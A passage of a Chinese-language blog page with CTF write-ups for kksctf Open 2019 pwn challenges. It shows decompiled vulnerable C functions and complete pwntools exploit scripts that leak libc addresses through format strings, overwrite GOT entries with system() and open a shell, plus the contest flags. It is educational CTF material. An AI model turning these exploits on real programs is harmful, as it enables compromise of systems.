class="line">got_free = elf.got[<span class="string">'free'</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">allocate</span><span class="params">(allocate_idx, allocate_size, allocate_message)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'1'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'Enter chunk ID: '</span>, str(allocate_idx))</span><br><span class="line">    p.sendlineafter(<span class="string">'Enter chunk size: '</span>, str(allocate_size))</span><br><span class="line">    p.sendlineafter(<span class="string">'Your message: '</span>, allocate_message)</span><br><span class="line">    p.sendlineafter(<span class="string">'Done!\n'</span>, <span class="string">''</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span><span class="params">(free_idx)</span>:</span></span><br><span class="line">    p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'3'</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">'Enter chunk ID: '</span>, str(free_idx))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">allocate(<span class="number">0</span>, <span class="number">0x20</span>, <span class="string">'%13$p'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'2'</span>)</span><br><span class="line">addr___libc_start_main = int(p.recv(<span class="number">10</span>), <span class="number">16</span>) - <span class="number">241</span></span><br><span class="line">libcbase = addr___libc_start_main - libc.sym[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">addr_system = libcbase + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">allocate(<span class="number">0</span>, <span class="number">0x20</span>, p32(got_free))</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">allocate(<span class="number">1</span>, <span class="number">0x40</span>, <span class="string">'%3d%6$hhn'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'&gt;'</span>, <span class="string">'2'</span>)</span><br><span class="line">free(<span class="number">0</span>)</span><br><span class="line">allocate(<span class="number">2</span>, <span class="number">0x40</span>, <span class="string">'/bin/sh\x00'</span>)</span><br><span class="line">allocate(<span class="number">3</span>, <span class="number">0x20</span>, p32(got_free))</span><br><span class="line">allocate(<span class="number">4</span>, <span class="number">0x20</span>, p32(got_free))</span><br><span class="line">allocate(<span class="number">5</span>, <span class="number">0x20</span>, p32(addr_system))</span><br><span class="line">success(<span class="string">'got_free    = '</span> + hex(got_free))</span><br><span class="line">success(<span class="string">'addr_system = '</span> + hex(addr_system))</span><br><span class="line">free(<span class="number">2</span>)</span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<hr>

<h3 id="Flag-2"><a href="#Flag-2" class="headerlink" title="Flag:"></a>Flag:</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kks&#123;w311_m4y_b3_in_@_c0upl3_m0r3_pl4c35&#125;</span><br></pre></td></tr></table></figure>



<h2 id="Another-ret-to-libc"><a href="#Another-ret-to-libc" class="headerlink" title="Another ret to libc"></a>Another ret to libc</h2><h3 id="Description-3"><a href="#Description-3" class="headerlink" title="Description:"></a>Description:</h3><blockquote>

<p>Kackers are hiding some crucial information here. We don’t know what exactly it is, but can you help us to retrive it?<br><br>nc tasks.open.kksctf.ru 10001<br><br>libc: <a href="https://drive.google.com/open?id=1t9G-yAWk0c8eLTlDZ45DstV0UqmrScgS" target="_blank" rel="noopener">https://drive.google.com/open?id=1t9G-yAWk0c8eLTlDZ45DstV0UqmrScgS</a></p>

</blockquote>

<hr>

<h3 id="Solution-3"><a href="#Solution-3" class="headerlink" title="Solution:"></a>Solution:</h3><p>依旧是格式化字符串的漏洞利用</p>

<p>只有 4 人解的原因估计是期末考试、加 libc 网上没版本、加本地调试、加泄露出来的<code>__libc_start_main</code>竟然不是减 247 而是减 249</p>

<p>不过这题本地调试是减去 247，而且远程打通后还容易莫名显示 Segmentation fault，因为这个我放弃了 hn 转用 hhn，但是依旧容易出现这个错误</p>

<p>本地想调试的话需要先输入<code>export LD_PRELOAD=&#39;/lib/i386-linux-gnu/libc.so.6&#39;</code></p>

<p><strong>1.print_user_info</strong></p>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">print_user_info</span><span class="params">(<span class="keyword">int</span> a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v1; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+0h] [ebp-2Ch]</span></span><br><span class="line">  FILE *stream; <span class="comment">// [esp+20h] [ebp-Ch]</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// [esp+24h] [ebp-8h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Information about user #"</span>);</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">while</span> ( v5 &lt;= <span class="number">7</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    v1 = v5++;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"%02x"</span>, *(a1 + v1 + <span class="number">0x104</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">":\nname: %s\n"</span>, a1);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"age: %d\n"</span>, *(a1 + <span class="number">0x100</span>));</span><br><span class="line">  result = <span class="built_in">strcmp</span>(priveleged, (a1 + <span class="number">0x104</span>));</span><br><span class="line">  <span class="keyword">if</span> ( !result )</span><br><span class="line">  &#123;</span><br><span class="line">    stream = fopen(<span class="string">"TOTALY_NOTHING_INTERESTING_HERE.txt"</span>, <span class="string">"r"</span>);</span><br><span class="line">    fgets(&amp;s, <span class="number">32</span>, stream);</span><br><span class="line">    result = <span class="built_in">puts</span>(&amp;s);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p><strong>2.change_user_name</strong></p>

<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> __<span class="function">cdecl <span class="title">change_user_name</span><span class="params">(<span class="keyword">char</span> *s2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> s; <span class="comment">// [esp+0h] [ebp-104h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">"Enter new name: "</span>);</span><br><span class="line">  fgets(&amp;s, <span class="number">0x100</span>, <span class="built_in">stdin</span>);</span><br><span class="line">  <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(&amp;s, s2) )</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"New name can not match with the old one!"</span>);</span><br><span class="line">  <span class="built_in">sprintf</span>(s2, &amp;s);</span><br><span class="line">  s2[<span class="number">0x100</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">puts</span>(<span class="string">"Your name has been seccessfully changed!"</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<p>可以看到有很多格式化字符串漏洞，我们这里主要用 change_user_name 进行利用</p>

<p>这两个函数是被主函数调用的，依靠堆里存放的地址来进行调用，所以要记住一会儿进行利用时不要覆盖地址</p>

<p>那么就先泄露 __libc_start_main，然后算出 addr_system 的地址</p>

<p>之后修改 got_strcmp 为 addr_system，依靠 fgets 输入的<code>/bin/sh</code>来进行提权</p>

<p><strong>exp如下：</strong></p>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line"><span class="comment"># context(log_level="debug", arch="i386", os="linux")</span></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span>:</span><br><span class="line">    p = process(<span class="string">'./r2lc'</span>)</span><br><span class="line">    libc = ELF(<span class="string">'/lib/i386-linux-gnu/libc.so.6'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p = remote(<span class="string">'tasks.open.kksctf.ru'</span>, <span class="number">10001</span>)</span><br><span class="line">    libc = ELF(<span class="string">'./libc.so.6'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line">elf = ELF(<span class="string">'./r2lc'</span>, checksec=<span class="literal">False</span>)</span><br><span class="line">got_strcmp = elf.got[<span class="string">'strcmp'</span>]</span><br><span class="line">addr_main = <span class="number">0x08048964</span></span><br><span class="line">addr_change_user_name = <span class="number">0x08048791</span></span><br><span class="line"></span><br><span class="line">p.sendlineafter(<span class="string">'Enter your name: '</span>, <span class="string">'binLep'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'Enter your age: '</span>, <span class="string">'4'</span>)</span><br><span class="line">p.sendline(<span class="string">''</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'&gt; '</span>, <span class="string">'2'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'Enter new name: '</span>, <span class="string">'%73$p'</span>)</span><br><span class="line">p.sendline(<span class="string">''</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'&gt; '</span>, <span class="string">'1'</span>)</span><br><span class="line">p.recvuntil(<span class="string">'name: '</span>)</span><br><span class="line">addr___libc_start_main = int(p.recv(<span class="number">10</span>), <span class="number">16</span>) - <span class="number">249</span></span><br><span class="line">libcbase = addr___libc_start_main - libc.sym[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">addr_system = libcbase + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">success(<span class="string">'addr_system = '</span> + hex(addr_system))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p, "b *0x08048805\nc")</span></span><br><span class="line">p.sendline(<span class="string">''</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'&gt; '</span>, <span class="string">'2'</span>)</span><br><span class="line">off_1 = (addr_system &amp; <span class="number">0xff</span>) - <span class="number">12</span></span><br><span class="line">off_2 = (addr_system &gt;&gt; <span class="number">8</span> &amp; <span class="number">0xff</span>) - <span class="number">12</span></span><br><span class="line">off_3 = (addr_system &gt;&gt; <span class="number">16</span> &amp; <span class="number">0xff</span>) - <span class="number">12</span></span><br><span class="line">pd = p32(got_strcmp)  <span class="comment"># 4</span></span><br><span class="line">pd += p32(got_strcmp + <span class="number">1</span>)  <span class="comment"># 8</span></span><br><span class="line">pd += p32(got_strcmp + <span class="number">2</span>)  <span class="comment"># 12</span></span><br><span class="line">pd += <span class="string">'%'</span> + str(off_1) + <span class="string">'d%1$hhn'</span></span><br><span class="line">pd += <span class="string">'%'</span> + str(<span class="number">0x104</span> - off_1) + <span class="string">'d'</span></span><br><span class="line">pd += p32(addr_change_user_name)</span><br><span class="line">pd += <span class="string">'%'</span> + str(off_2 - <span class="number">0x08</span>) + <span class="string">'d%2$hhn'</span></span><br><span class="line">pd += <span class="string">'%'</span> + str(off_3 - (off_2 + <span class="number">0x100</span> &amp; <span class="number">0xff</span>)) + <span class="string">'d%3$hhn'</span></span><br><span class="line">p.sendlineafter(<span class="string">'Enter new name: '</span>, pd)</span><br><span class="line">p.sendline(<span class="string">''</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'&gt; '</span>, <span class="string">'2'</span>)</span><br><span class="line">p.sendlineafter(<span class="string">'Enter new name: '</span>, <span class="string">'/bin/sh'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>



<hr>

<h3 id="Flag-3"><a href="#Flag-3" class="headerlink" title="Flag:"></a>Flag:</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kks&#123;50_cl053_bu7_inr34ch3b!3&#125;</span><br></pre></td></tr></table></figure>

      

    </div>

    

  </div>

  

    

    <div class="copyright">

        <p><span>本文标题:</span><a href="">【WriteUp】#kksctf Open 2019--Pwn题解</a></p>

        <p><span>文章作者:</span><a href="/old_blog_01/" title="回到主页">binLep</a></p>

        <p><span>发布时间:</span>2019-12-30, 15:22:00</p>

        <p><span>最后更新:</span>2019-12-31, 09:48:30</p>

        <p>

            <span>原始链接:</span><a class="post-url" href="" title="【WriteUp】#kksctf Open 2019--Pwn题解">https://binlep.github.io/old_blog_01/2019/12/30/【WriteUp】kksctf open 2019--Pwn题解/</a>

            <span class="copy-path" data-clipboard-text="原文: https://binlep.github.io/old_blog_01/2019/12/30/【WriteUp】kksctf open 2019--Pwn题解/　　作者: binLep" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>

            <script> var clipboard = new Clipboard('.copy-path'); </script>

        </p>

        <p>

            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。

        </p>

    </div>







    <nav id="article-nav">

        

            <div id="article-nav-newer" class="article-nav-title">

                <a href="../../../../2020/01/03/【汇编学习】mips 指令集/">

                    【汇编学习】Mips 指令集

                </a>

            </div>

        

        

            <div id="article-nav-older" class="article-nav-title">

                <a href="../../25/【WriteUp】攻防世界--Pwn题解(Part 3)/">

                    【WriteUp】攻防世界--Pwn题解(Part 3)

                </a>

            </div>

        

    </nav>



  

</article>



    <div id="toc" class="toc-article">

        <strong class="toc-title">文章目录</strong>

        

            <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Baby-buffer-overflow"><span class="toc-number">1.</span> <span class="toc-text">Baby buffer overflow</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution"><span class="toc-number">1.2.</span> <span class="toc-text">Solution:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Flag"><span class="toc-number">1.3.</span> <span class="toc-text">Flag:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Insane-pwn"><span class="toc-number">2.</span> <span class="toc-text">Insane pwn</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.2.</span> <span class="toc-text">Solution:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Flag-1"><span class="toc-number">2.3.</span> <span class="toc-text">Flag:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Heap-Heap-Hooray"><span class="toc-number">3.</span> <span class="toc-text">Heap-Heap-Hooray!</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.2.</span> <span class="toc-text">Solution:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Flag-2"><span class="toc-number">3.3.</span> <span class="toc-text">Flag:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Another-ret-to-libc"><span class="toc-number">4.</span> <span class="toc-text">Another ret to libc</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Description-3"><span class="toc-number">4.1.</span> <span class="toc-text">Description:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Solution-3"><span class="toc-number">4.2.</span> <span class="toc-text">Solution:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Flag-3"><span class="toc-number">4.3.</span> <span class="toc-text">Flag:</span></a></li></ol></li></ol>

        

    </div>

    <style>

        .left-col .switch-btn,

        .left-col .switch-area {

            display: none;

        }

        .toc-level-3 i,

        .toc-level-3 ol {

            display: none !important;

        }

    </style>



    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">



    <script>

        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];

    </script>







    

<div class="share">

    

        <div class="bdsharebuttonbox">

            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>

            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>

            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>

            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>

            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>

            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>

            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>

        </div>

        <script>

            window._bd_share_config={

                "common":{"bdSnsKey":{},"bdText":"【WriteUp】#kksctf Open 2019--Pwn题解　| binLep's Blog　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];

        </script>

    



    

</div>















    









    <div class="scroll" id="post-nav-button">

        

            <a href="../../../../2020/01/03/【汇编学习】mips 指令集/" title="上一篇: 【汇编学习】Mips 指令集">

                <i class="fa fa-angle-left"></i>

            </a>

        



        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>



        

            <a href="../../25/【WriteUp】攻防世界--Pwn题解(Part 3)/" title="下一篇: 【WriteUp】攻防世界--Pwn题解(Part 3)">

                <i class="fa fa-angle-right"></i>

            </a>

        

    </div>



    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/29/【置顶】博客搬家啦/">【置顶】博客搬家啦</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/23/【WriteUp】NPUCTF 2020 -- Pwn 题解/">【WriteUp】NPUCTF 2020 -- Pwn 题解（未完）</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/21/【WriteUp】UMDCTF  2020 -- Pwn 题解/">【WriteUp】UMDCTF  2020 -- Pwn 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/15/【Pwn 笔记】IO FILE 利用链汇总/">【Pwn 笔记】IO FILE 利用链汇总（待补充）</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/15/【Pwn 笔记】glibc 利用中那些偏门的技巧/">【Pwn 笔记】Glibc 利用中那些偏门的技巧</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/13/【WriteUp】Byte Bandits CTF 2020 -- Pwn 题解/">【WriteUp】Byte Bandits CTF 2020 -- Pwn 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/04/12/【WriteUp】TG：HACK 2020 -- Pwn 题解/">【WriteUp】TG：HACK 2020 -- Pwn 题解（未完）</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/30/【Blockchain 笔记】区块链的环境搭建/">【Blockchain 笔记】区块链的环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/26/【Pwn 笔记】Windows Pwn 环境搭建/">【Pwn 笔记】Windows Pwn 环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/24/【Pwn 笔记】Linux 命令注入一览/">【Pwn 笔记】Linux 命令注入一览</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/24/【WrtieUp】BJDCTF 2nd -- Pwn 题解/">【WrtieUp】BJDCTF 2nd -- Pwn 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/21/【WrtieUp】CISCN 2019 -- Pwn 题解/">【WrtieUp】CISCN 2019 -- Pwn 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/20/【Pwn 笔记】跨平台架构的环境配置与调试/">【Pwn 笔记】跨平台架构的环境配置与调试</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/12/【Pwn 笔记】Linux Kernel 调试命令总结/">【Pwn 笔记】Linux Kernel 调试命令总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/12/【Pwn 笔记】Linux Kernel 总结 -- ROP/">【Pwn 笔记】Linux Kernel 总结 -- Kernel-ROP</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/12/【Pwn 笔记】Linux Kernel 调试文件总结/">【Pwn 笔记】Linux Kernel 调试文件总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/10/【WriteUp】高校抗“疫”网络安全分享赛 -- Pwn 题解/">【WriteUp】高校抗“疫”网络安全分享赛 -- Pwn 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/03/03/【Pwn 笔记】栈溢出利用总结 -- Advanced ROP/">【Pwn 笔记】栈溢出利用总结 -- Advanced ROP</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/29/【Crypto 笔记】古典密码学习/">【Crypto 笔记】古典密码学习</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/28/【Web 笔记】md5 绕过总结/">【Web 笔记】Md5 绕过总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/28/【Web 笔记】关于 SSTI 注入/">【Web 笔记】关于 SSTI 注入及绕过</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/25/【杂项】磁盘阵列知识梳理/">【杂项】磁盘阵列知识梳理</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/25/【SQL 笔记】绕过技术总结/">【SQL 笔记】绕过技术总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/18/【SQL 笔记】Oracle 12c 如何调用 SCOTT 用户/">【SQL 笔记】Oracle 12c 如何调用 SCOTT 用户</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/16/【WriteUp】HGAME 2020--Pwn题解/">【WriteUp】HGAME 2020--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/15/【WriteUp】ACTF 2020 题解/">【WriteUp】ACTF 2020 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/02/02/【Misc 笔记】流量分析篇/">【Misc 笔记】流量分析篇</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/24/【Pwn 笔记】Android Kernel 环境搭建/">【Pwn 笔记】Android Kernel 环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/13/【Pwn 笔记】Linux Kernel 环境搭建/">【Pwn 笔记】Linux Kernel 环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/13/【WriteUp】SCTF 2019--Pwn题解/">【WriteUp】SCTF 2019--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/12/【WriteUp】RoarCTF 2019--Pwn题解/">【WriteUp】RoarCTF 2019--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/11/【Pwn 笔记】简单记如何利用 ret2_dl_resolve/">【Pwn 笔记】简单记如何利用 Ret2_dl_resolve</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/04/【WriteUp】安恒杯元旦月赛--Pwn题解/">【WriteUp】安恒杯元旦月赛--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/03/【汇编学习】mips 寄存器/">【汇编学习】Mips 寄存器</a></li><li class="post-list-item"><a class="post-list-link" href="../../../../2020/01/03/【汇编学习】mips 指令集/">【汇编学习】Mips 指令集</a></li><li class="post-list-item"><a class="post-list-link" href="">【WriteUp】#kksctf Open 2019--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../25/【WriteUp】攻防世界--Pwn题解(Part 3)/">【WriteUp】攻防世界--Pwn题解(Part 3)</a></li><li class="post-list-item"><a class="post-list-link" href="../../25/【Pwn 笔记】函数中的宏常量定义/">【Pwn 笔记】函数中的宏常量定义</a></li><li class="post-list-item"><a class="post-list-link" href="../../24/【WriteUp】第三届“华为杯”XMan冬令营选拔赛题解/">【WriteUp】第三届“华为杯”XMan冬令营选拔赛题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../16/【Pwn 笔记】格式化字符串总结/">【Pwn 笔记】格式化字符串总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../13/【WriteUp】攻防世界--Pwn题解(Part 2)/">【WriteUp】攻防世界--Pwn题解(Part 2)</a></li><li class="post-list-item"><a class="post-list-link" href="../../../11/18/【WriteUp】成都大学第二届玄武杯CTF信息安全竞赛题解/">【WriteUp】成都大学第二届玄武杯CTF信息安全竞赛题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../11/05/【WriteUp】Hackme CTF--Pwn题解/">【WriteUp】Hackme CTF--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../11/03/【学习总结】Python沙箱逃逸/">【学习总结】Python沙箱逃逸</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/28/【Docker】Docker使用教程/">【Docker】Docker使用教程</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/28/【Docker】Docker安装教程/">【Docker】Docker安装教程</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/28/【WriteUp】RSCTF 2019 题解/">【WriteUp】RSCTF 2019 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/15/【Pwn 笔记】堆利用总结/">【Pwn 笔记】堆利用总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/14/【WriteUp】CryptixCTF'19 题解/">【WriteUp】CryptixCTF'19 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/05/【WriteUp】攻防世界--Pwn题解(Part 1)/">【WriteUp】攻防世界--Pwn题解(Part 1)</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/03/【WriteUp】MOCTF--web题解/">【WriteUp】MOCTF--Web题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../10/02/【杂项】一些网站汇总/">【杂项】一些网站汇总</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/28/【WriteUp】Newark Academy CTF 2019 题解/">【WriteUp】Newark Academy CTF 2019 题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/24/【WriteUp】Jarvis OJ--Pwn题解/">【WriteUp】Jarvis OJ--Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/19/【BugkuCTF】Pwn题解/">【BugkuCTF】Pwn题解</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/11/【杂项】C语言函数总结/">【杂项】C语言函数总结</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/10/【Pwn 笔记】堆利用总结--空闲块篇/">【Pwn 笔记】堆利用总结--空闲块篇</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/09/【Hexo】让Github Pages被索引到/">【Hexo】让Github Pages被索引到</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/09/【Hexo】更改Yelee主题内部文件为自己想要的样式/">【Hexo】更改Yelee主题内部文件为自己想要的样式</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/09/【Gem】gem安装教程/">【Gem】gem安装教程</a></li><li class="post-list-item"><a class="post-list-link" href="../../../09/08/【TokyoWesterns CTF 5th 2019】Web--j2x2j/">【TokyoWesterns CTF 5th 2019】Web--J2x2j</a></li><li 